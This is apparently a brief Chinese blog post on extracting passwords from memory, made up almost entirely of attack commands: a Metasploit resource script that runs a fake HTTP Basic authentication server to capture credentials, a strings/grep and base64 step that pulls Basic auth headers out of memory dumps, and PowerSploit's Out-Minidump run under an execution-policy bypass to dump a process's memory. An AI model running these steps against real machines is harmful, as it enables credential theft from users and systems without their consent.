内存密码挖掘 - whale3070's blog

视频教程地址

msfconsole -r pass.rc

1
2
3

use auxiliary/server/capture/http_basic
set uripath x
run

1 2	`strings /root/Desktop/*.DMP \| grep "Authorization: Basic" echo "cXdmOnF3Zg==" \| base64 -d`

powersploit

使用该脚本获取内存中的密码

1
2
3

powershell -nop -ep bypass
Import-Module C:\Users\user\Desktop\Out-Minidump.ps1
Out-Minidump Get-Process -Id pid

windows